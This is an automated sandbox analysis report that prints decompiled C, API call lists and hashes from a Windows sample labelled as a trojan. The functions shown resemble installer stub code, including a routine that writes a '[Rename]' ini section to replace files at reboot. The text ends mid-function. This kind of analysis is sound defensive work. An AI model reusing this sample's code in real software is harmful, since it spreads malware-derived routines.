                                                          • GetDlgItem.USER32 ref: 004044DB
                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044F9
                                                          • GetSysColor.USER32(?), ref: 0040450A
                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404519
                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404528
                                                          • lstrlenA.KERNEL32(?), ref: 0040452B
                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040453A
                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040454F
                                                          • GetDlgItem.USER32 ref: 004045B1
                                                          • SendMessageA.USER32(00000000), ref: 004045B4
                                                          • GetDlgItem.USER32 ref: 004045DF
                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040461F
                                                          • LoadCursorA.USER32 ref: 0040462E
                                                          • SetCursor.USER32(00000000), ref: 00404637
                                                          • LoadCursorA.USER32 ref: 0040464D
                                                          • SetCursor.USER32(00000000), ref: 00404650
                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040467C
                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404690
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: N$B
                                                          • API String ID: 3103080414-4074832742
                                                          • Opcode ID: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                          • Instruction ID: c8b3317feb23aa92da8c88ca1c3cf39d399e1714613d550ff25a6b2d3c0ef38e
                                                          • Opcode Fuzzy Hash: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                          • Instruction Fuzzy Hash: 3761A1B1A40209BFDB109F61CD45F6A3BA9FB84744F00443AFB05BA1D1D7BDA9618F98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                          				struct tagLOGBRUSH _v16;
                                                          				struct tagRECT _v32;
                                                          				struct tagPAINTSTRUCT _v96;
                                                          				struct HDC__* _t70;
                                                          				struct HBRUSH__* _t87;
                                                          				struct HFONT__* _t94;
                                                          				long _t102;
                                                          				signed int _t126;
                                                          				struct HDC__* _t128;
                                                          				intOrPtr _t130;
                                                          
                                                          				if(_a8 == 0xf) {
                                                          					_t130 =  *0x42f454;
                                                          					_t70 = BeginPaint(_a4,  &_v96);
                                                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                          					_a8 = _t70;
                                                          					GetClientRect(_a4,  &_v32);
                                                          					_t126 = _v32.bottom;
                                                          					_v32.bottom = _v32.bottom & 0x00000000;
                                                          					while(_v32.top < _t126) {
                                                          						_a12 = _t126 - _v32.top;
                                                          						asm("cdq");
                                                          						asm("cdq");
                                                          						asm("cdq");
                                                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                          						_t87 = CreateBrushIndirect( &_v16);
                                                          						_v32.bottom = _v32.bottom + 4;
                                                          						_a16 = _t87;
                                                          						FillRect(_a8,  &_v32, _t87);
                                                          						DeleteObject(_a16);
                                                          						_v32.top = _v32.top + 4;
                                                          					}
                                                          					if( *(_t130 + 0x58) != 0xffffffff) {
                                                          						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                          						_a16 = _t94;
                                                          						if(_t94 != 0) {
                                                          							_t128 = _a8;
                                                          							_v32.left = 0x10;
                                                          							_v32.top = 8;
                                                          							SetBkMode(_t128, 1);
                                                          							SetTextColor(_t128,  *(_t130 + 0x58));
                                                          							_a8 = SelectObject(_t128, _a16);
                                                          							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);
                                                          							SelectObject(_t128, _a8);
                                                          							DeleteObject(_a16);
                                                          						}
                                                          					}
                                                          					EndPaint(_a4,  &_v96);
                                                          					return 0;
                                                          				}
                                                          				_t102 = _a16;
                                                          				if(_a8 == 0x46) {
                                                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                          					 *((intOrPtr*)(_t102 + 4)) =  *0x42f448;
                                                          				}
                                                          				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                          			}













                                                          0x0040100a
                                                          0x00401039
                                                          0x00401047
                                                          0x0040104d
                                                          0x00401051
                                                          0x0040105b
                                                          0x00401061
                                                          0x00401064
                                                          0x004010f3
                                                          0x00401089
                                                          0x0040108c
                                                          0x004010a6
                                                          0x004010bd
                                                          0x004010cc
                                                          0x004010cf
                                                          0x004010d5
                                                          0x004010d9
                                                          0x004010e4
                                                          0x004010ed
                                                          0x004010ef
                                                          0x004010ef
                                                          0x00401100
                                                          0x00401105
                                                          0x0040110d
                                                          0x00401110
                                                          0x00401112
                                                          0x00401118
                                                          0x0040111f
                                                          0x00401126
                                                          0x00401130
                                                          0x00401142
                                                          0x00401156
                                                          0x00401160
                                                          0x00401165
                                                          0x00401165
                                                          0x00401110
                                                          0x0040116e
                                                          0x00000000
                                                          0x00401178
                                                          0x00401010
                                                          0x00401013
                                                          0x00401015
                                                          0x0040101f
                                                          0x0040101f
                                                          0x00000000

                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32 ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32 ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F$Setup Setup
                                                          • API String ID: 941294808-1602013819
                                                          • Opcode ID: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                          • Instruction ID: 0ac27d016dd37b64d299d3f81b39716040336c4aee851974846d4d7042c5b915
                                                          • Opcode Fuzzy Hash: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                          • Instruction Fuzzy Hash: CA419C71800249AFCF058FA5DE459AF7FB9FF44314F00802AF991AA1A0C778EA55DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405EBC(void* __ecx) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				long _t12;
                                                          				long _t24;
                                                          				char* _t31;
                                                          				int _t37;
                                                          				void* _t38;
                                                          				intOrPtr* _t39;
                                                          				long _t42;
                                                          				CHAR* _t44;
                                                          				void* _t46;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t52;
                                                          				void* _t53;
                                                          
                                                          				_t38 = __ecx;
                                                          				_t44 =  *(_t52 + 0x14);
                                                          				 *0x42c648 = 0x4c554e;
                                                          				if(_t44 == 0) {
                                                          					L3:
                                                          					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca48, 0x400);
                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                          						_t37 = wsprintfA(0x42c248, "%s=%s\r\n", 0x42c648, 0x42ca48);
                                                          						_t53 = _t52 + 0x10;
                                                          						E004062E0(_t37, 0x400, 0x42ca48, 0x42ca48,  *((intOrPtr*)( *0x42f454 + 0x128)));
                                                          						_t12 = E00405DE6(0x42ca48, 0xc0000000, 4);
                                                          						_t48 = _t12;
                                                          						 *(_t53 + 0x18) = _t48;
                                                          						if(_t48 != 0xffffffff) {
                                                          							_t42 = GetFileSize(_t48, 0);
                                                          							_t6 = _t37 + 0xa; // 0xa
                                                          							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                          							if(_t46 == 0 || E00405E5E(_t48, _t46, _t42) == 0) {
                                                          								L18:
                                                          								return CloseHandle(_t48);
                                                          							} else {
                                                          								if(E00405D4B(_t38, _t46, "[Rename]\r\n") != 0) {
                                                          									_t49 = E00405D4B(_t38, _t21 + 0xa, 0x40a3f0);
                                                          									if(_t49 == 0) {
                                                          										_t48 =  *(_t53 + 0x18);
                                                          										L16:
                                                          										_t24 = _t42;
                                                          										L17:
                                                          										E00405DA1(_t24 + _t46, 0x42c248, _t37);
                                                          										SetFilePointer(_t48, 0, 0, 0);
                                                          										E00405E8D(_t48, _t46, _t42 + _t37);
                                                          										GlobalFree(_t46);
                                                          										goto L18;
                                                          									}
                                                          									_t39 = _t46 + _t42;
                                                          									_t31 = _t39 + _t37;
                                                          									while(_t39 > _t49) {
                                                          										 *_t31 =  *_t39;
                                                          										_t31 = _t31 - 1;
                                                          										_t39 = _t39 - 1;
                                                          									}
                                                          									_t24 = _t49 - _t46 + 1;
                                                          									_t48 =  *(_t53 + 0x18);
                                                          									goto L17;
                                                          								}
                                                          								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                          								_t42 = _t42 + 0xa;
                                                          								goto L16;
                                                          							}
                                                          						}
                                                          					}
                                                          				} else {
                                                          					CloseHandle(E00405DE6(_t44, 0, 1));
                                                          					_t12 = GetShortPathNameA(_t44, 0x42c648, 0x400);
                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                          						goto L3;
                                                          					}
                                                          				}
                                                          				return _t12;
                                                          			}



















                                                          0x00405ebc
                                                          0x00405ec5
                                                          0x00405ecc
                                                          0x00405ee0
                                                          0x00405f08
                                                          0x00405f13
                                                          0x00405f17
                                                          0x00405f37
                                                          0x00405f3e
                                                          0x00405f48
                                                          0x00405f55
                                                          0x00405f5a
                                                          0x00405f5f
                                                          0x00405f63
                                                          0x00405f72
                                                          0x00405f74
                                                          0x00405f81
                                                          0x00405f85
                                                          0x00406020
                                                          0x00000000
                                                          0x00405f9b
                                                          0x00405fa8
                                                          0x00405fcc
                                                          0x00405fd0
                                                          0x00405fef
                                                          0x00405ff3
                                                          0x00405ff3
                                                          0x00405ff5
                                                          0x00405ffe
                                                          0x00406009
                                                          0x00406014
                                                          0x0040601a
                                                          0x00000000
                                                          0x0040601a
                                                          0x00405fd2
                                                          0x00405fd5
                                                          0x00405fe0
                                                          0x00405fdc
                                                          0x00405fde
                                                          0x00405fdf
                                                          0x00405fdf
                                                          0x00405fe7
                                                          0x00405fe9
                                                          0x00000000
                                                          0x00405fe9
                                                          0x00405fb3
                                                          0x00405fb9
                                                          0x00000000
                                                          0x00405fb9
                                                          0x00405f85
                                                          0x00405f63
                                                          0x00405ee2
                                                          0x00405eed
                                                          0x00405ef6
                                                          0x00405efa
                                                          0x00000000
                                                          0x00000000
                                                          0x00405efa
                                                          0x0040602b

                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,0040604D,?,?), ref: 00405EED
                                                          • GetShortPathNameA.KERNEL32 ref: 00405EF6
                                                            • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                            • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                          • GetShortPathNameA.KERNEL32 ref: 00405F13
                                                          • wsprintfA.USER32 ref: 00405F31
                                                          • GetFileSize.KERNEL32(00000000,00000000,0042CA48,C0000000,00000004,0042CA48,?,?,?,?,?), ref: 00405F6C
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7B
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB3
                                                          • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,0042C248,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406009
                                                          • GlobalFree.KERNEL32 ref: 0040601A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406021
                                                            • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe,80000000,00000003), ref: 00405DEA
                                                            • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %s=%s$[Rename]
                                                          • API String ID: 2171350718-1727408572
                                                          • Opcode ID: eb1cb4180cb4c9ea78b19c93ed4765593701f1c4a8a9694117d5f32cc93988d7
                                                          • Instruction ID: 93867bad2f833244898b90dcbcfca195f0b3b673d55ab92eabf696d68ffba162
                                                          • Opcode Fuzzy Hash: eb1cb4180cb4c9ea78b19c93ed4765593701f1c4a8a9694117d5f32cc93988d7
                                                          • Instruction Fuzzy Hash: 29310371640B16ABC2306B659D48F6B3A5CDF45758F14003BF942F62C2EA7CE8118AAD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 72%
                                                          			E004062E0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                          				struct _ITEMIDLIST* _v8;
                                                          				char _v12;
                                                          				signed int _v16;
                                                          				signed char _v20;
                                                          				signed int _v24;
                                                          				signed char _v28;
                                                          				signed int _t38;
                                                          				CHAR* _t39;
                                                          				signed int _t41;
                                                          				char _t52;
                                                          				char _t53;
                                                          				char _t55;
                                                          				char _t57;
                                                          				void* _t65;
                                                          				char* _t66;
                                                          				signed int _t80;
                                                          				intOrPtr _t86;
                                                          				char _t88;
                                                          				void* _t89;
                                                          				CHAR* _t90;
                                                          				void* _t92;
                                                          				signed int _t97;
                                                          				signed int _t99;
                                                          				void* _t100;
                                                          
                                                          				_t92 = __esi;
                                                          				_t89 = __edi;
                                                          				_t65 = __ebx;
                                                          				_t38 = _a8;
                                                          				if(_t38 < 0) {
                                                          					_t86 =  *0x42ec1c; // 0x53f080
                                                          					_t38 =  *(_t86 - 4 + _t38 * 4);
                                                          				}
                                                          				_push(_t65);
                                                          				_push(_t92);
                                                          				_push(_t89);
                                                          				_t66 = _t38 +  *0x42f498;
                                                          				_t39 = 0x42e3e0;
                                                          				_t90 = 0x42e3e0;
                                                          				if(_a4 >= 0x42e3e0 && _a4 - 0x42e3e0 < 0x800) {
                                                          					_t90 = _a4;
                                                          					_a4 = _a4 & 0x00000000;
                                                          				}
                                                          				while(1) {
                                                          					_t88 =  *_t66;
                                                          					if(_t88 == 0) {
                                                          						break;
                                                          					}
                                                          					__eflags = _t90 - _t39 - 0x400;
                                                          					if(_t90 - _t39 >= 0x400) {
                                                          						break;
                                                          					}
                                                          					_t66 = _t66 + 1;
                                                          					__eflags = _t88 - 4;
                                                          					_a8 = _t66;
                                                          					if(__eflags >= 0) {
                                                          						if(__eflags != 0) {
                                                          							 *_t90 = _t88;
                                                          							_t90 =  &(_t90[1]);
                                                          							__eflags = _t90;
                                                          						} else {
                                                          							 *_t90 =  *_t66;
                                                          							_t90 =  &(_t90[1]);
                                                          							_t66 = _t66 + 1;
                                                          						}
                                                          						continue;
                                                          					}
                                                          					_t41 =  *((char*)(_t66 + 1));
                                                          					_t80 =  *_t66;
                                                          					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                                                          					_v24 = _t80;
                                                          					_v28 = _t80 | 0x00000080;
                                                          					_v16 = _t41;
                                                          					_v20 = _t41 | 0x00000080;
                                                          					_t66 = _a8 + 2;
                                                          					__eflags = _t88 - 2;
                                                          					if(_t88 != 2) {
                                                          						__eflags = _t88 - 3;
                                                          						if(_t88 != 3) {
                                                          							__eflags = _t88 - 1;
                                                          							if(_t88 == 1) {
                                                          								__eflags = (_t41 | 0xffffffff) - _t97;
                                                          								E004062E0(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                                                          							}
                                                          							L42:
                                                          							_t90 =  &(_t90[lstrlenA(_t90)]);
                                                          							_t39 = 0x42e3e0;
                                                          							continue;
                                                          						}
                                                          						__eflags = _t97 - 0x1d;
                                                          						if(_t97 != 0x1d) {
                                                          							__eflags = (_t97 << 0xa) + 0x430000;
                                                          							E0040624D(_t90, (_t97 << 0xa) + 0x430000);
                                                          						} else {
                                                          							E004061AB(_t90,  *0x42f448);
                                                          						}
                                                          						__eflags = _t97 + 0xffffffeb - 7;
                                                          						if(_t97 + 0xffffffeb < 7) {
                                                          							L33:
                                                          							E00406528(_t90);
                                                          						}
                                                          						goto L42;
                                                          					}
                                                          					_t52 =  *0x42f44c;
                                                          					__eflags = _t52;
                                                          					_t99 = 2;
                                                          					if(_t52 >= 0) {
                                                          						L13:
                                                          						_a8 = 1;
                                                          						L14:
                                                          						__eflags =  *0x42f4e4;
                                                          						if( *0x42f4e4 != 0) {
                                                          							_t99 = 4;
                                                          						}
                                                          						__eflags = _t80;
                                                          						if(__eflags >= 0) {
                                                          							__eflags = _t80 - 0x25;
                                                          							if(_t80 != 0x25) {
                                                          								__eflags = _t80 - 0x24;
                                                          								if(_t80 == 0x24) {
                                                          									GetWindowsDirectoryA(_t90, 0x400);
                                                          									_t99 = 0;
                                                          								}
                                                          								while(1) {
                                                          									__eflags = _t99;
                                                          									if(_t99 == 0) {
                                                          										goto L30;
                                                          									}
                                                          									_t53 =  *0x42f444;
                                                          									_t99 = _t99 - 1;
                                                          									__eflags = _t53;
                                                          									if(_t53 == 0) {
                                                          										L26:
                                                          										_t55 = SHGetSpecialFolderLocation( *0x42f448,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                                                          										__eflags = _t55;
                                                          										if(_t55 != 0) {
                                                          											L28:
                                                          											 *_t90 =  *_t90 & 0x00000000;
                                                          											__eflags =  *_t90;
                                                          											continue;
                                                          										}
                                                          										__imp__SHGetPathFromIDListA(_v8, _t90);
                                                          										_v12 = _t55;
                                                          										__imp__CoTaskMemFree(_v8);
                                                          										__eflags = _v12;
                                                          										if(_v12 != 0) {
                                                          											goto L30;
                                                          										}
                                                          										goto L28;
                                                          									}
                                                          									__eflags = _a8;
                                                          									if(_a8 == 0) {
                                                          										goto L26;
                                                          									}
                                                          									_t57 =  *_t53( *0x42f448,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
                                                          									__eflags = _t57;
                                                          									if(_t57 == 0) {
                                                          										goto L30;
                                                          									}
                                                          									goto L26;
                                                          								}
                                                          								goto L30;
                                                          							}
                                                          							GetSystemDirectoryA(_t90, 0x400);
                                                          							goto L30;
                                                          						} else {
                                                          							E00406134((_t80 & 0x0000003f) +  *0x42f498, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f498, _t90, _t80 & 0x00000040);
                                                          							__eflags =  *_t90;
                                                          							if( *_t90 != 0) {
                                                          								L31:
                                                          								__eflags = _v16 - 0x1a;
                                                          								if(_v16 == 0x1a) {
                                                          									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                          								}
                                                          								goto L33;
                                                          							}
                                                          							E004062E0(_t66, _t90, _t99, _t90, _v16);
                                                          							L30:
                                                          							__eflags =  *_t90;
                                                          							if( *_t90 == 0) {
                                                          								goto L33;
                                                          							}
                                                          							goto L31;
                                                          						}
                                                          					}
                                                          					__eflags = _t52 - 0x5a04;
                                                          					if(_t52 == 0x5a04) {
                                                          						goto L13;
                                                          					}
                                                          					__eflags = _v16 - 0x23;
                                                          					if(_v16 == 0x23) {
                                                          						goto L13;
                                                          					}
                                                          					__eflags = _v16 - 0x2e;
                                                          					if(_v16 == 0x2e) {
                                                          						goto L13;
                                                          					} else {
                                                          						_a8 = _a8 & 0x00000000;
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          				 *_t90 =  *_t90 & 0x00000000;
                                                          				if(_a4 == 0) {
                                                          					return _t39;
                                                          				}
                                                          				return E0040624D(_a4, _t39);
                                                          			}



























                                                          0x004062e0
                                                          0x004062e0
                                                          0x004062e0
                                                          0x004062e6
                                                          0x004062eb
                                                          0x004062ed
                                                          0x004062fc
                                                          0x004062fc
                                                          0x00406304
                                                          0x00406305
                                                          0x00406306
                                                          0x00406307
                                                          0x0040630a
                                                          0x00406312
                                                          0x00406314
                                                          0x0040632b
                                                          0x0040632e
                                                          0x0040632e
                                                          0x00406505
                                                          0x00406505
                                                          0x00406509
                                                          0x00000000
                                                          0x00000000
                                                          0x0040633b
                                                          0x00406341
                                                          0x00000000
                                                          0x00000000
                                                          0x00406347
                                                          0x00406348
                                                          0x0040634b
                                                          0x0040634e
                                                          0x004064f8
                                                          0x00406502
                                                          0x00406504
                                                          0x00406504
                                                          0x004064fa
                                                          0x004064fc
                                                          0x004064fe
                                                          0x004064ff
                                                          0x004064ff
                                                          0x00000000
                                                          0x004064f8
                                                          0x00406354
                                                          0x00406358
                                                          0x00406368
                                                          0x0040636f
                                                          0x00406372
                                                          0x0040637a
                                                          0x0040637d
                                                          0x00406384
                                                          0x00406385
                                                          0x00406388
                                                          0x004064a5
                                                          0x004064a8
                                                          0x004064d8
                                                          0x004064db
                                                          0x004064e0
                                                          0x004064e4
                                                          0x004064e4
                                                          0x004064e9
                                                          0x004064ef
                                                          0x004064f1
                                                          0x00000000
                                                          0x004064f1
                                                          0x004064aa
                                                          0x004064ad
                                                          0x004064c2
                                                          0x004064c9
                                                          0x004064af
                                                          0x004064b6
                                                          0x004064b6
                                                          0x004064d1
                                                          0x004064d4
                                                          0x0040649d
                                                          0x0040649e
                                                          0x0040649e
                                                          0x00000000
                                                          0x004064d4
                                                          0x0040638e
                                                          0x00406395
                                                          0x00406397
                                                          0x00406398
                                                          0x004063b2
                                                          0x004063b2
                                                          0x004063b9
                                                          0x004063b9
                                                          0x004063c0
                                                          0x004063c4
                                                          0x004063c4
                                                          0x004063c5
                                                          0x004063c7
                                                          0x00406400
                                                          0x00406403
                                                          0x00406413
                                                          0x00406416
                                                          0x0040641e
                                                          0x00406424
                                                          0x00406424
                                                          0x00406483
                                                          0x00406483
                                                          0x00406485
                                                          0x00000000
                                                          0x00000000
                                                          0x00406428
                                                          0x0040642f
                                                          0x00406430
                                                          0x00406432
                                                          0x0040644c
                                                          0x0040645a
                                                          0x00406460
                                                          0x00406462
                                                          0x00406480
                                                          0x00406480
                                                          0x00406480
                                                          0x00000000
                                                          0x00406480
                                                          0x00406468
                                                          0x00406471
                                                          0x00406474
                                                          0x0040647a
                                                          0x0040647e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040647e
                                                          0x00406434
                                                          0x00406437
                                                          0x00000000
                                                          0x00000000
                                                          0x00406446
                                                          0x00406448
                                                          0x0040644a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040644a
                                                          0x00000000
                                                          0x00406483
                                                          0x0040640b
                                                          0x00000000
                                                          0x004063c9
                                                          0x004063e4
                                                          0x004063e9
                                                          0x004063ec
                                                          0x0040648c
                                                          0x0040648c
                                                          0x00406490
                                                          0x00406498
                                                          0x00406498
                                                          0x00000000
                                                          0x00406490
                                                          0x004063f6
                                                          0x00406487
                                                          0x00406487
                                                          0x0040648a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040648a
                                                          0x004063c7
                                                          0x0040639a
                                                          0x0040639e
                                                          0x00000000
                                                          0x00000000
                                                          0x004063a0
                                                          0x004063a4
                                                          0x00000000
                                                          0x00000000
                                                          0x004063a6
                                                          0x004063aa
                                                          0x00000000
                                                          0x004063ac
                                                          0x004063ac
                                                          0x00000000
                                                          0x004063ac
                                                          0x004063aa
                                                          0x0040650f
                                                          0x00406519
                                                          0x00406525
                                                          0x00406525
                                                          0x00000000

                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32 ref: 0040640B
                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040641E
                                                          • SHGetSpecialFolderLocation.SHELL32(004053AC,00000000,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040645A
                                                          • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406468
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00406474
                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406498
                                                          • lstrlenA.KERNEL32(Call,?,0042A098,00000000,004053AC,0042A098,00000000,00000000,00000000,00000000), ref: 004064EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-1230650788
                                                          • Opcode ID: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                          • Instruction ID: cb9956cf134697f00dd0045f5d81f520e4bdc76bf78ec342c260f9164b19bc27
                                                          • Opcode Fuzzy Hash: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                          • Instruction Fuzzy Hash: 5F611571A00104AEEB219F64DD85BBE3BA4AB15314F56413FE903B62D1D37C89A2CB5E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E740D24D8(intOrPtr* _a4) {
                                                          				char _v80;
                                                          				int _v84;
                                                          				intOrPtr _v88;
                                                          				short _v92;
                                                          				intOrPtr* _t28;
                                                          				void* _t30;
                                                          				intOrPtr _t31;
                                                          				signed int _t43;
                                                          				void* _t44;
                                                          				intOrPtr _t45;
                                                          				void* _t48;
                                                          
                                                          				_t44 = E740D1215();
                                                          				_t28 = _a4;
                                                          				_t45 =  *((intOrPtr*)(_t28 + 0x814));
                                                          				_v88 = _t45;
                                                          				_t48 = (_t45 + 0x41 << 5) + _t28;
                                                          				do {
                                                          					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
                                                          					}
